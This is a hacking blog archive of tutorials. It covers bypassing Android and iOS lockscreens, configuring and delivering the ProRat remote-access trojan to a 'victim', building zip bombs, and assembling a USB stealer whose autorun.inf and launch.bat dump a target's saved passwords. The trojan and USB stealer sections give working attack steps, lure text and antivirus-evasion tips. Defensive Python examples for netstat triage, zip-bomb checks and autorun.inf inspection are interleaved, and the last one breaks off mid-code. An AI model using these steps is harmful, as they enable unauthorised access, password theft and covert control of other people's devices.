Tag Archives: hack

Bypassing/Hacking Android Devices (Factory reset)

Android Device Factory reset

Introduction: A factory reset is the last resort for getting past the lockscreen on an Android device. It does work, but every bit of data on the device is erased; some of it may be recoverable afterwards with different tools. Here are the steps to factory data reset and bypass any Android phone/device.

Steps:

  • Press and hold the correct keys to boot the device into recovery mode. This varies from device to device. Here are some examples:
      • Nexus 7: Volume Up + Volume Down + Power
      • Samsung Galaxy S3: Volume Up + Home + Power
      • Motorola Droid X: Home + Power
      • Devices with camera buttons: Volume Up + Camera
    Similar devices will likely use similar key combinations. For example, the Nexus 4 also uses Volume Up + Volume Down + Power. If your device isn’t on this list and none of the above methods work, do a Google search for the name of your device and “recovery mode”, or look in the device’s manual or support pages.
  • Release the buttons when the device powers on. You’ll see an image of an Android lying on its back with its chest open and its internals revealed.
  • Press the Volume Up and Volume Down keys to scroll through the options until you see Recovery mode on the screen.
  • Press the Power button to restart into recovery mode. You’ll soon see an Android with a red triangle.
  • Hold down the Power button and tap Volume Up. You’ll see the Android system recovery menu appear at the top of your screen.
  • Select wipe data / factory reset with the volume keys and tap the Power button to activate it.
  • Select Yes – erase all user data with the volume buttons and tap Power. Your device will be reset to its factory state and all your data will be erased. 

    Note: If your device freezes at any point, hold down the Power button until it restarts.

Bypassing/Hacking Apple Device iOS 6.1.2

Hacking iPhone

Introduction: This vulnerability allows users to bypass the lock screen passcode and access the phone’s photos and contacts. Researchers say the vulnerable device can be plugged into a computer via USB to access data like voicemails, pictures, contacts, etc.

Steps:

  • Connect the device to iTunes and the App Store to make sure the passcode lock is activated.
  • Push the power button (top right).
    The phone will wake and the iOS passcode lock will be visible.
  • Now tap Emergency Call.
  • Dial any emergency number from a public listing (we used 911, 110 and 112).
  • Call the number and cancel the call directly after dialling, before it connects.
  • Push the power button again, then push the iPhone home button (the square one in the middle).
  • In the next step, hold the power button for 3 seconds, and in the third second also push the home button with one finger and the Emergency Call button with another.
  • After pushing all three buttons, take your finger off the home (middle) button and then off the power button.
  • The iOS display will go black (black screen).
  • Take out your USB plug and connect it to the iOS device while it is in black screen mode.
  • All files like photos, contacts and so on will be available directly from the device storage without entering the PIN.

Bypassing/Hacking Samsung Galaxy Note 2 & S3

Hacking Lockscreen

Introduction: This tutorial shows how to hack or bypass the lockscreen on a Samsung Galaxy Note 2 or S3. It is really simple and relies on a bug that was discovered. It may not work at first, as it needs some practice to do correctly, so just keep trying; I think you will succeed within about 20 attempts.

Steps:

  • Lock the device with a “secure” pattern, PIN, or password.
  • Activate the screen.
  • Press “Emergency Call”.
  • Press the “ICE” button on the bottom left.
  • Hold down the physical home key for a few seconds and then release.
  • The phone’s home screen will be displayed – briefly.
  • While the home screen is displayed, click on an app or a widget.
  • The app or widget will launch.
  • If the widget is “direct dial” the phone will start ringing.

Bypass Android Device Lockscreen

Introduction: The lockscreen is one of the cornerstones of security on Android. It keeps nosy people at bay, deters ill intentions and serves as a barrier to entry for would-be thieves. However, sometimes it manages to keep even you at bay – it’s very easy to forget your lockscreen PIN, or to mess up the pattern unlock. So, what can you do once that happens and you’re locked out of your own device? Well, come with us as we take a look at some of the methods you can use to bypass or even hack your own, or maybe someone else’s, lockscreen completely!

Android Device Manager:

This is by far the easiest and most direct method of bypassing the lockscreen, since it’s supported by Google and doesn’t really have any special requirements. It should work for most users, and is very simple to do. All you need is Android Device Manager enabled beforehand, which is something Google automatically does for you anyway in most modern devices, and a data connection.

Steps:

  • Go to https://www.google.com/android/devicemanager?hl=en&u=0 and enter your Google account password
  • You’ll see the Device Manager dashboard. It will attempt to locate your device on the map, which if you have GPS and a data connection enabled, it should be able to do.
  • Press the “Lock” button. It will show you a screen where you are able to replace your current lockscreen PIN number with a new one, set by you.
  • Enter the new PIN and select “Lock”. Your device should automatically lock.
  • Unlock your device by entering the new PIN number you just set. After unlocking, feel free to go to Settings and set a new one.

Like I said, this is the most straightforward solution, but it does require a data connection, which won’t be available to everyone, for example because you are not able to turn on Wi-Fi or mobile data after unlock. In that case, I have a few more solutions listed below.

Note: This method only works for your personal device or a device containing your Google or Samsung account.

USB Debugging:

In case you have USB Debugging enabled (for those who aren’t aware, this option can be found in Settings, under Developer options), there’s a lot you can do to try and hack the lockscreen to bypass it completely. For this, you’ll need to set up and install ADB, which stands for Android Debug Bridge. This is a feature meant for developers that allows them to interact directly with the device and send it commands in order to get accurate data in real time. However, we can use it to send our own commands and try to get rid of the lockscreen completely.

Steps:

  • Install and set up ADB. This varies from manufacturer to manufacturer, and even within devices, so you’ll need to find a tutorial for your specific device. However, there are a few easier methods depending on your OS, like the 15 Second ADB Installer for Windows that is more or less universal and easy to set up.
  • Open an ADB session. This is done by connecting your device to the computer over USB, opening a command prompt or terminal on your OS, and typing “adb devices”. You should get a code in return that identifies your device, meaning that ADB is working correctly and is able to see your device. If you get an error, you don’t have USB Debugging enabled or ADB set up properly (for example, you may need to navigate to a certain folder and open the command prompt from there – look for solutions for your case).
  • Enter the following commands:

adb shell
cd data/system
su
rm *.key

  • These commands will directly send a request to the device asking to delete all the .key files in the data/system directory and subdirectories, which is where lockscreen system data is stored.
  • Reboot the device, and the lockscreen should be gone. If you still get a lockscreen, enter any code and it should unlock.

Note: If the above solution didn’t work for you, try these commands instead (make sure you start a new ADB session!):

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name='lock_pattern_autolock';
update system set value=0 where name='lockscreen.lockedoutpermanently';
.quit

  • Again, reboot and enter any code to get rid of the lockscreen. If that one didn’t work either, you can try this one as a last resort:

adb shell rm /data/system/gesture.key

  • Again, reboot and see if it worked. If none of these commands worked thus far, there’s not much else you can do using this method alone, so you’ll have to try the next one, given below:

Root and a Custom Recovery:

In case your device is rooted and you have a custom recovery installed, you can flash a file directly to the device that will delete the .key file storing the PIN directly using a script. In order to do this:

  • Download this file: https://mega.co.nz/#!NVtyWQDA!7qy58ihYMY07ehADl2tDUIzK4bF0XzO_xh7k-JWj_aY
  • Copy the file over to the device. If your device uses an SD Card, copy it there. Otherwise, you can use ADB with the “push” command in order to send the file to a folder on your device. Look for instructions if you’re unsure about how to do this.
  • Boot into the recovery. Each device has its own method to do this, so look it up (generally it’s a combination of volume and power buttons after reboot).
  • Flash the file.
  • Reboot the device. The lockscreen should be gone, or able to accept any code.

If all of these didn’t work I will post some more in some time.

Trojan Horse (Using)

Trojan

Introduction: This tutorial is about configuring and using a Trojan. There are many Trojans available on internet for free. Some popular ones are Beast, Pro Rat, Netbus , Back Orifice, Girlfriend, Sub 7. I will be using Pro Rat in this tutorial.

Requirements:

1. Prorat- Click here to download Trojan Prorat.
2. Hostname – Your IP address is probably dynamic, meaning it changes every time you disconnect and reconnect. You need a hostname which always automatically keeps pointing to your changing IP. Follow these steps:

  • Log on to http://www.no-ip.com and register for an account.
  • Go to Hosts/Redirects -> Add Host and choose any free available hostname. Do not change any other option and simply click on Create Host.
  • Download and install their DNS update client, available at http://www.no-ip.com/downloads.php. Run it and enter your credentials. Update your hostname and save it.

Let’s check whether your IP has been associated with the chosen hostname or not. Go to the command prompt and type ‘ping yourhostname’ (without quotes); hopefully it should reply with your IP address.

Tutorial for configuring Trojan: 

  • Open prorat.exe that you have downloaded.
  • Click on Create  and then Create ProRat Server.
  • Enter your host name in the ProRat Notification field as shown. Uncheck all other options.
  • Click on the General Settings tab and have a look at the server port, password and victim name. Remember these. Check out and configure the other options as per your need. You can bind server.exe with any genuine file, change its icon, etc.
  • Finally click on Create Server and now it’s ready to be sent to the victim. Once the victim installs it, it would automatically disable the antivirus/firewall.

Modes of sending: 
You must be thinking of sending this server.exe to the victim through an email as an attachment, but unfortunately you can’t do so. The better option is to upload it to an uploading site like mediafire.com and give the download link to the victim, or you can transfer it by a pendrive (USB) or CD/DVD.

What after victim has run the server part ?

  • Click on the ProConnective tab and start listening for connections. Allow it through the firewall if it asks you to open a port.
  • You will start listening for connections; that is, you will get a notification as shown when the victim comes online.

Note: If you know the victim is online and it’s still not listening to any connections, trace the victim’s IP, enter it in the IP field and hit Connect. But it’s only going to work if he is not behind any network and is directly connected to the internet. If you don’t know how to trace an IP, click over HERE.

What after successful connection ?

After you have managed to connect to the victim’s machine, there are numberless interesting things to do. I leave this part to you. Have fun.

How to make it undetectable by antivirus?
There isn’t any hard and fast way to make it fully undetectable by all antivirus products. The real way to do it is to modify the source code of the open-source Trojans available; it’s a very challenging job. There are many crypters which claim to make it undetectable, but unfortunately hardly one out of every hundred works. I would try to write an article on disabling antivirus.
Countermeasure against Trojans –
The obvious countermeasure against Trojans is to not accept download links blindly. Keep your antivirus up to date.

Detecting and removing Trojan –
A Trojan, once installed, is very hard to remove. It will hide itself from Task Manager. Install Process Explorer and it should show you all running processes, including the Trojan. Kill the process and remove it. Another good thing to do is to carefully check the open ports and running services with the ‘netstat’ command. Anyway, the best option is to reinstall Windows.
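One way to make the netstat check above less error-prone is to script the triage. The following is an added example, not the article’s own code: it parses constructed `netstat -ano` output (Windows column layout), flags any LISTENING port that is not in an assumed baseline for the machine, and then flags outbound connections made by those same processes, since a RAT either waits for its controller (direct connection) or calls out to it (reverse connection). The sample rows, the PID 3320, the baseline ports and the LAN ranges are all assumptions made for the demonstration.

```python
import ipaddress

# Constructed sample of `netstat -ano` output (Windows layout); not captured
# from a real host. PID 3320 is the hypothetical suspect process.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:51234          0.0.0.0:0              LISTENING       3320
  TCP    192.168.1.20:49700     203.0.113.7:443        ESTABLISHED     3320
  TCP    192.168.1.20:49701     192.168.1.1:80         ESTABLISHED     2280
  UDP    0.0.0.0:5353           *:*                                    1404
"""

# Assumed baseline for this workstation: ports it is expected to listen on,
# and the address ranges that count as "inside" the local network.
EXPECTED_LISTENERS = {135, 139, 445, 5353}
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16", "127.0.0.0/8")]


def parse_netstat(text: str) -> list:
    """Turn the TCP/UDP rows of netstat output into dicts; skip header lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP":
            state, pid = parts[3], int(parts[4])
        else:                       # UDP rows have no State column
            state, pid = "", int(parts[3])
        rows.append({"proto": parts[0], "local": parts[1], "foreign": parts[2],
                     "state": state, "pid": pid})
    return rows


def split_addr(addr: str):
    """'host:port' -> (host, port or None); handles [IPv6]:port and *:*."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def is_local(host: str) -> bool:
    """True when the address falls inside one of the assumed LAN ranges."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in LOCAL_NETS)


def triage(rows: list, expected=EXPECTED_LISTENERS) -> list:
    """Flag listeners outside the baseline, then any connection those same
    PIDs hold to an address outside the LAN."""
    findings, suspect_pids = [], set()
    for r in rows:
        _, port = split_addr(r["local"])
        if r["state"] == "LISTENING" and port not in expected:
            findings.append(f"unexpected listener {r['proto']} {r['local']} pid={r['pid']}")
            suspect_pids.add(r["pid"])
    for r in rows:
        fhost, _ = split_addr(r["foreign"])
        if r["state"] == "ESTABLISHED" and r["pid"] in suspect_pids and not is_local(fhost):
            findings.append(f"pid {r['pid']} also connected outside the LAN to {r['foreign']}")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_netstat(SAMPLE_NETSTAT)):
        print(finding)
```

On the sample above it reports the listener on port 51234 and the outbound connection held by the same PID; a PID flagged this way is the one to look up in Process Explorer before killing it. The baseline set is the part that has to be maintained per machine, which is why a one-off `netstat` glance tends to miss things.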

Trojan Horse (Introduction)

Trojan
Introduction:
A Trojan horse is a remote administration tool (RAT). This is something extremely dangerous: a Trojan gives the attacker full control of the victim’s PC.
A Trojan has two parts. One is the client part (control panel) and the other is the server part (meant to be sent to the victim).
The basic methodology of using a Trojan is as follows:
  • The attacker creates an executable file a few KB in size. This is the server part of the Trojan and is mostly called server.exe.
  • The attacker might hide this server.exe behind a genuine-looking file like a song or image. The attacker gives this file to the victim, who is supposed to double-click on it.
  • As the victim runs the server part, a port on the victim’s computer gets opened and the attacker can control the PC remotely from any part of the world through the control panel (client part). The attacker can do anything with the victim’s computer remotely that the victim himself can do on it.

Note: From here on I am assuming that you know a little bit about IP addresses, that is, LAN/internal/private and WAN/external/public IPs.

Two different ways a Trojan can work:
  1. Direct connection: In this method, after the server part has been installed on the victim’s machine, the attacker enters the public IP address assigned to the victim’s computer to make a connection to it. The limitation of a direct connection is that the public IP address is most probably dynamic and changes every time the victim disconnects and reconnects, so the attacker needs to find out the victim’s IP address each time. Moreover, an incoming connection like this is usually restricted by the firewall.
The main limitation of a direct connection is that you cannot reach a victim who is behind a router or on a network, because the victim’s machine is not assigned a public/external/WAN IP. It is only assigned a private/internal/LAN IP, which is meaningless for computers outside that network. The WAN IP belongs to his router.

It doesn’t matter how the attacker is connected to the internet; the attacker can be connected by any of the three means.

  2. Reverse connection: In this method, the attacker enters his own IP address in the server part while configuring it. So when the server part is installed on the victim’s computer, it automatically makes a connection to the client part, that is, the attacker. Also, the firewall on the victim’s machine would not restrict outgoing connections. The problem in this case is the same: the attacker’s IP is also dynamic. But this can be overcome easily: the attacker actually enters a domain name in the server part which always points to his dynamic IP.

So you just learned what a Trojan really is; click HERE to visit the page on how to use a Trojan.

Zip Bomb

Zip Bomb

Introduction: A zip bomb, also known as a decompression bomb (or the ‘Zip of Death’ for the overly dramatic ones), is a malicious archive file designed to crash or render useless the program or system reading it. It is often employed to disable antivirus software, in order to create an opening for more traditional viruses. Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (e.g. by a virus scanner in order to scan for viruses) requires inordinate amounts of time, disk space or memory.

The classic zip bomb is a tiny zip file; most are measured in kilobytes. However, when this file is unzipped its contents are more than what the system can handle (usually up to a petabyte, i.e. 1000 terabytes; some go up to an exabyte too). Yes, we’re talking about stuffing exabytes of data into kilobytes. In my view, this ingenious little trick is the product of “pure hacker mentality”. In essence, it’s nothing like phishing or session hijacking or anything else that has put a bad name to “hackers”. It’s a simple creative solution, an exploited loophole which truly shows: “Where there’s a will, there’s a way”. To understand how it works, we have to take a little detour to see how data compression works (WinZip, WinRAR etc.).

Various compression tools make use of what are called “lossless compression algorithms”. As the name suggests, these algorithms strive to compress files without any loss of information: clearly, when we compress a file we want to get it back in exactly the same shape after decompressing. These algorithms usually exploit statistical redundancy so as to represent the data more concisely without error. In plain English: the computer only understands 0’s and 1’s, so every program or piece of data stored on your computer is actually just a series of 1’s and 0’s (binary form). Let’s take an example that’s not entirely correct but will help you understand the principle. Say we’ve got a file which, converted to binary, looks like “1110000101”. Remember the statistical redundancy mentioned earlier? Try to spot it in this string (1110000101). Statistical redundancy basically means that the same thing is repeated over and over again. In this string we see three 1’s followed by four 0’s. Now take a look at this string: “3140101”. What just happened here is compression. We can simply write a program that codes and decodes files as above (software like WinZip uses a fancier and far more complicated form of what we did). If the program finds repeating patterns, like a lot of 1’s together, it can replace all those 1’s by a count. Another example: say we find “111111111” somewhere in a file. That’s nine 1’s in a row. What if we replace it by “91”? We can code our program to replace a “91” by writing “1” nine times, effectively reversing the process. That is, while decoding, if the program encounters any number other than 1 or 0, in our case 9, it writes the following digit, in our case 1, that many times. So “91” gets converted back to “111111111”. That’s lossless compression.

What about the previous string (3140101)? On decompressing it, we get back 1110000101, that is, the original string. Like I said, this example is not entirely accurate: the computer only understands binary, and everything you ever do on a computer will at some point be converted to binary form. The computer is forced to convert to something other than binary (like English) only for us humans. We compressed “111111111” by writing “91”, but the “9” in “91” will itself have to be converted back into 1’s and 0’s, so our program is quite buggy. Widely used programs like WinZip, WinRAR, PowerISO etc. use various algorithms for different cases.

Lossless compression is possible because most real-world data has statistical redundancy. Lossless compression schemes are reversible so that the original data can be reconstructed.
However, lossless data compression algorithms will always fail to compress some files. Indeed, any compression algorithm will necessarily fail to compress any data containing no discernible patterns. Attempts to compress data that has been compressed already may actually result in an expansion, as will attempts to compress all but the most trivially encrypted data. This is why if you’ve ever tried “ZIPing” or “RARing” a file, you would have noticed in some cases it works great while in other cases it may not even reduce the file size by 5%. (WinRAR and WinZIP can be considered the same for (almost) all practical purposes. Their names differ more than their compression abilities. Feel free to use either.)

Now, back to zip bombs. Before taking a deeper look, let’s get the basic idea cleared up. Take a new text file and write ‘0’ a 1000 times. Save it; the file size should be just around 1 kilobyte. Open it up, CTRL+A, CTRL+C, CTRL+V – i.e. copy the whole thing, then paste it. Do this ten times. Our file is now around 10 KB and completely made of 0’s. Do this a few more times. Faster than you expect, the file size will climb into megabytes and then gigabytes. In most cases Notepad (or any text editor) will begin to lag, since it has a ridiculous number of 0’s open in the window. When that happens, that’s your cue to slow down, since different operating systems and programs can behave unexpectedly when dealing with such large files. Practically, just keep it under a few gigabytes and you should be fine.
(Even this may be too much for some systems, I recommend pausing at about a 100 Mb and then slowly increasing the size. If the lag lasts longer than around 15 seconds, you’ve reached the limit.) So, we have a 5Gb text file (on an awesome computer) containing nothing but 0’s. A little perspective: That’s over five-freaking-billion zeros that the innocent little notepad obediently handled in a few seconds. So the next time you’re getting annoyed at your browser lagging a little bit, try taking a notebook and write down 5Gb worth of text. It’s only fair.

And we’re back. What do we do now with that ridiculously large text file? Compress it and watch your seriously underappreciated computer do magic. In the same directory, you’ll now see the pointlessly large text file, and alongside it, a zip file that should be under 1 Megabyte. That’s like stuffing 5000 balls into the volume of one.

Now, for a deeper look let’s check out the most famous zip bomb, the 42.zip file. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3 gigabyte (4 294 967 295 bytes; ~ 3.99 GiB) file for a total of 4.5 petabytes (4 503 599 626 321 920 bytes; ~ 3.99 PiB) of uncompressed data. This file is still available for download on various websites across the Internet. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level – effectively converting their exponential growth to linear.

(Here’s a small website dedicated solely to the 42.zip: http://www.unforgettable.dk/ . You can even download a ready-made zip bomb from there. The password for the zip file is ’42’. The file has a password to protect users who have ancient antivirus software that is set to automatically scan all downloads.)

Now, to avoid giving the wrong impression, a myth needs to be busted. “Zip bomb” is not a very accurate name for this malicious file. If you extract a zip bomb, it won’t do anything to your computer; it’ll just create 16 smaller zip bombs. If you decompress one of those, it’ll yield 16 more zip bombs. As such, they’re not going to “explode” when someone opens them; they’re just used by malware authors to knock out antivirus software so malware can work without needing to watch its back. What happens is, a malicious program may plant a zip bomb somewhere near it as bait for AV software. The program will wait until the antivirus comes up for a routine scan, “hiding” behind the zip bomb. When the antivirus reaches the bomb, it’ll try to open it, all in its limited memory. 1 file becomes 16, which becomes 256, and it goes on until the memory is full. In reality though, the computer never runs out of memory, because each process is only allowed to use so much memory; after it hits its limit it crashes itself to protect the rest of the computer from an OOM (out-of-memory) event. When this happens to an antivirus program as it’s trying to dig into the file for malware, the software simply crashes and exits, leaving the rest of the computer unharmed. The malware will detect this and then use the opportunity to do whatever it wants, without having to worry about AV software that might be right around the corner. Additionally, the nested archives make it much harder for programs like virus scanners (the main target of these “bombs”) to be smart and refuse to unpack archives that are “too large”, because until the last level the total amount of data is not “that much”: you don’t “see” how large the files at the lowest level are until you have reached that level, by which time it is, of course, too late.
However, most anti-virus software today recognizes a zip-bomb when it sees one, and will skip over it, alerting the user that the computer might be infected with malware. They usually go down to the second or third level before flagging the file.

Further, you wouldn’t notice disk space being used, because zip bombs only decompress in the antivirus program’s memory, not to disk. Most manual archive-opening programs don’t even have a recursive opening mode for this very reason. Plus, you also wouldn’t notice much extra work by the CPU, because zip bombs work so fast they can knock out an inadequately protected antivirus program in seconds, while only using a fraction of the computer’s total memory.
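As a defender-side illustration of the limits the text says scanners apply (a few levels of recursion, refusing archives that are “too large”), here is an added example that is not part of the original post. It reads a zip’s central directory with Python’s zipfile module, compares the declared uncompressed size and the compression ratio against a policy, and peeks into nested .zip members with a hard cap on how many bytes it will ever decompress, so a header that lies about sizes cannot drag it into unbounded work. The thresholds and the three constructed test archives (one of them 8 MiB of zeros, which DEFLATE shrinks about a thousandfold) are assumptions for the demonstration.

```python
import io
import zipfile

# Policy limits: constructed for this example, tune them to your environment.
MAX_RATIO = 100          # declared uncompressed bytes / compressed bytes, per archive
MAX_TOTAL = 512 * 2**20  # declared uncompressed bytes per archive
MAX_DEPTH = 2            # how many nested archive levels we are willing to open
PEEK_CAP = 1 * 2**20     # most bytes of a nested member we will ever decompress


def inspect_zip(data: bytes, depth: int = 0) -> dict:
    """Read the central directory, compare declared sizes against policy and
    peek into nested .zip members with a hard cap on decompressed bytes.
    Nothing is written to disk and no member is decompressed beyond PEEK_CAP."""
    report = {"depth": depth, "flags": [], "declared_total": 0, "ratio": 0.0}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        total = sum(i.file_size for i in infos)
        comp = sum(i.compress_size for i in infos) or 1
        report["declared_total"] = total
        report["ratio"] = total / comp
        if total > MAX_TOTAL:
            report["flags"].append("declared size exceeds MAX_TOTAL")
        if report["ratio"] > MAX_RATIO:
            report["flags"].append("compression ratio exceeds MAX_RATIO")
        for info in infos:
            if not info.filename.lower().endswith(".zip"):
                continue
            if depth + 1 > MAX_DEPTH:
                report["flags"].append(f"{info.filename}: nesting deeper than MAX_DEPTH")
                continue
            with zf.open(info) as member:
                inner = member.read(PEEK_CAP + 1)   # capped read, whatever the header claims
            if len(inner) > PEEK_CAP:
                report["flags"].append(f"{info.filename}: nested archive larger than PEEK_CAP")
                continue
            try:
                child = inspect_zip(inner, depth + 1)
            except zipfile.BadZipFile:
                report["flags"].append(f"{info.filename}: not a valid archive")
                continue
            report["flags"].extend(f"{info.filename}: {flag}" for flag in child["flags"])
    return report


def is_suspicious(data: bytes) -> bool:
    return bool(inspect_zip(data)["flags"])


def build_zip(members: dict) -> bytes:
    """Helper to construct in-memory test archives (DEFLATE, like a normal zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a normal archive, one whose ratio is far above policy
# (8 MiB of zeros), and that same archive wrapped two levels deep.
BENIGN = build_zip({"readme.txt": b"Quarterly report: revenue up 4%, costs flat.\n"})
PADDED = build_zip({"zeros.bin": b"\x00" * (8 * 2**20)})
NESTED = build_zip({"level1.zip": build_zip({"level2.zip": PADDED})})

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("padded", PADDED), ("nested", NESTED)):
        r = inspect_zip(blob)
        print(name, f"ratio={r['ratio']:.0f}", "flags=", r["flags"])
```

The check costs almost nothing because it only reads the central directory and a bounded prefix of each nested member; the nested sample is caught two levels down, at the point where the ratio first exceeds policy, which is the “second or third level” behaviour the text attributes to modern scanners. Raising MAX_DEPTH without also keeping PEEK_CAP small is the mistake to avoid.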

The 42.zip is just one example, there are many more like this and you can create your own. A similar file is an XML-based decompression bomb called “billion laughs” (or XML Bomb). Basically it crashes a web browser by causing the XML parser to run out of memory (Again, most browsers today will detect such recursive expansion and simply not try to parse the booby-trapped XML).

There’s even a torrent for one of the largest (and smallest) zip bombs on the internet although it seems all the seeders have long gone. It’s a 5.61 kilobyte zip file that expands to 4 zettabyte. It seems to be at the absolute limit of zip bombs. Here’s the KickAss Torrent link:

http://kickass.to/zip-bomb-insanely-huge-zip-archive-4zb-t2105770.html

(As a challenge, you can try replicating it. The file structure has been explained in the link: 8 layers, 32 archives in each layer, each archive containing a 4Gb file)

Let’s walk through the process once again. Make a 4 Gb text file full of 0’s. Zip it. Let’s call it zip1. Create, say, 10 copies of this zip file. We have 10 zip1’s. Now zip all ten zip1’s again. Call it zip2. We’re at the second level now, and we can simply continue the process for as long as we like; the unpacked size will just keep getting bigger and bigger. A common doubt is: how can we create a zip file that opens up to 4 zettabytes without having 4 zettabytes of storage on our computers? Actually, we don’t even need 10 Gb for this. We just took a 4Gb text file and zipped it (into zip1). We can simply delete the original text file, as it is no longer required. All we need is the first single tiny zip file, and it is of this zip file that we create more copies, zip them up, create more copies and zip again, and so on.

And that ends the story of the zip bomb. These actually come under the class of logic bombs, which also contains the fork bomb we made using batch files. Yet again, the name DDOS is going to pop up here: zip bombs are basically DDOSers for antiviruses. Limited memory is a ‘flaw’ that has remained in all computers since their inception, and hackers always find a way to exploit it. When the old methods stop working, new ones soon pop up and take their place: DDOSing, zip bombs, fork bombs, XML bombs, PDF bombs, buffer overflows and what not. This shows what a crucial part of programming ‘memory management’ really is. And so we live another day, ready to combat the next problem.

Password Stealer / USB Stealer

Password Stealer

Introduction: There are a lot of people in the world and even more online accounts. Every security system has a flaw, and what we’re going to discuss here is just that. Most people, with their eyes on the clock and not a second to spare, just tick “Remember Me” on various websites without a second thought, thinking it’s going to save them time. This is particularly common among people who have a private system, maybe a laptop that nobody else ever touches or a PC which they have locked with a password. They don’t know that many tools exist to “recover” saved passwords (more like to exploit exactly these naive people). Browsers store passwords and account details in cookies. What’s quite surprising is just how little security they offer; even worse, none of the browsers seem to care about encrypting passwords. Most of them have an option to “Show Saved Passwords” in the options menu. We’re going to cut even that out: just plug in a USB drive, take it out and voilà, we have all the passwords. That is what you’ll learn in this tutorial. So, with a goal in mind and not a second to spare, let’s start right away.

Things you will need (see the link below):

MessenPass – MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications.

Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook Express, Windows Mail, POP3 etc.

IE Passview – IE passview is another small program that helps us view stored passwords in Internet explorer.

Protected Storage PassView (PSPV) – Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I’ve tried and tested. More like these surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/)

So that’s that and now we are ready to create a USB password stealer.
Note: These programs tend to attract a lot of attention from antivirus software (get used to this). Kindly disable your antivirus before performing these steps, at your own risk of course.

  • First of all, download all 5 tools onto your USB drive. Most of them are just single .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the programs in their entirety on your pen drive. Make sure you have all the installation files on your USB drive, if any.)
  • Create a new Notepad and write the following text into it:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

  • Save the Notepad and rename it from New Text Document.txt to autorun.inf
  • Now copy the autorun.inf file onto your USB pendrive.
  • Create another Notepad and write the following text onto it. (Yep, still no copy-pasting allowed.)

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

  • Save the Notepad and rename it from New Text Document.txt to launch.bat
  • Copy the launch.bat file also to your USB drive.

These were simple commands to start up our password “recovering” programs as soon as we plug in the USB drive. What we just did is hook our launch.bat batch file up to the autorun.inf file, which runs automatically when the computer detects the USB drive. In launch.bat we start our programs and pass them file names as parameters, so that each program writes the passwords it finds to its own .txt file.

Now your USB password stealer is ready. All you have to do is insert it into your victim’s computer; a pop-up will appear, and in the pop-up window select the option (Perform a Virus Scan). As soon as you click it, your USB password stealer will do its magic and all the passwords saved on the system will be written to .txt files. I recommend you try it out on your own system first to see how it should work.
See the last line of our autorun.inf: we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious.
This may not work on all operating systems and all browsers. Your best bet is to pack in as many diverse programs as you can, to give yourself the best chance. Also, note that the computer must not have the autorun feature disabled for the USB stealer to work.
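The autorun.inf above is the whole trick, so it is also the thing a defender can look for on removable media. The following is an added example for this page (not part of the tutorial or of any of the tools it lists): a small parser for the autorun.inf format that flags entries which launch a program and AutoPlay labels that read like a lure; the sample file is constructed inline to match the one the steps above create.

```python
"""Inspect an autorun.inf from removable media and flag entries that launch a
program or dress that launch up as a harmless action. Added example for this
page, not part of the original tutorial; the sample autorun.inf is constructed
inline to match the one the steps above create."""
import configparser

# Keys that make Windows run, or offer to run, a program when the drive is inserted.
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")
RISKY_EXTENSIONS = (".bat", ".cmd", ".exe", ".vbs", ".js", ".scr", ".com", ".pif")
# Words typically used so the AutoPlay prompt reads like a legitimate system task.
LURE_WORDS = ("scan", "virus", "install", "update", "open folder", "backup")

# Constructed sample: the tutorial's two entries, with the section header on its own line.
SAMPLE_AUTORUN = """[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
"""


def parse_autorun(text):
    """Return the [autorun] section as a dict with lowercased keys (the section
    name is matched case-insensitively, as Windows does)."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    for section in parser.sections():
        if section.lower() == "autorun":
            return dict(parser.items(section))
    return {}


def assess_autorun(text):
    """Return (severity, message) findings for one autorun.inf."""
    entries = parse_autorun(text)
    findings = []
    for key in LAUNCH_KEYS:
        target = entries.get(key)
        if not target:
            continue
        # First token is the program; anything after it is arguments.
        program = target.split()[0].strip('"').lower()
        if program.endswith(RISKY_EXTENSIONS):
            findings.append(("high", f"{key}= runs a script or executable: {target}"))
        else:
            findings.append(("medium", f"{key}= runs: {target}"))
    action = entries.get("action", "")
    if action and any(word in action.lower() for word in LURE_WORDS):
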